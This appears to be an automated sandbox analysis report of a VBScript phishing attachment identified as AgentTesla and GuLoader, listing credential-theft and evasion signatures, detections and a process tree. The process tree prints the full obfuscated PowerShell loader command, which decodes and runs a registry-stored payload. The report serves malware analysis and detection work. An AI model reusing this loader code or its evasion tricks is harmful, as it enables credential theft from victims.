Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Richiesta urgente.vbs

Overview

General Information

Sample Name:Richiesta urgente.vbs
Analysis ID:755115
MD5:de0edf01710a38b1e96688ae2f712ebb
SHA1:6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256:20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 4088 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 1004 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5840 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne = $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1= Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4416 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1076 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 6072 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Richiesta urgente.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa34:$s1: .CreateObject("WScript.Shell")
  • 0x3f562:$p1: powershell.exe
  • 0x4c69c:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 5840INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x15ed6:$b2: ::FromBase64String(
          • 0x5e98a:$b2: ::FromBase64String(
          • 0x17beb2:$b2: ::FromBase64String(
          • 0x268a5:$s1: -join
          • 0x27005:$s1: -join
          • 0xb3272:$s1: -join
          • 0xc0347:$s1: -join
          • 0xc3719:$s1: -join
          • 0xc3dcb:$s1: -join
          • 0xc58bc:$s1: -join
          • 0xc7ac2:$s1: -join
          • 0xc82e9:$s1: -join
          • 0xc8b59:$s1: -join
          • 0xc9294:$s1: -join
          • 0xc92c6:$s1: -join
          • 0xc930e:$s1: -join
          • 0xc932d:$s1: -join
          • 0xc9b7d:$s1: -join
          • 0xc9cf9:$s1: -join
          • 0xc9d71:$s1: -join
          • 0xc9e04:$s1: -join
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_4088.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
          • 0x1a:$s1: .CreateObject("WScript.Shell")
          • 0x72:$s1: .CreateObject("WScript.Shell")
          • 0x1d9:$p1: powershell.exe

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""U
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp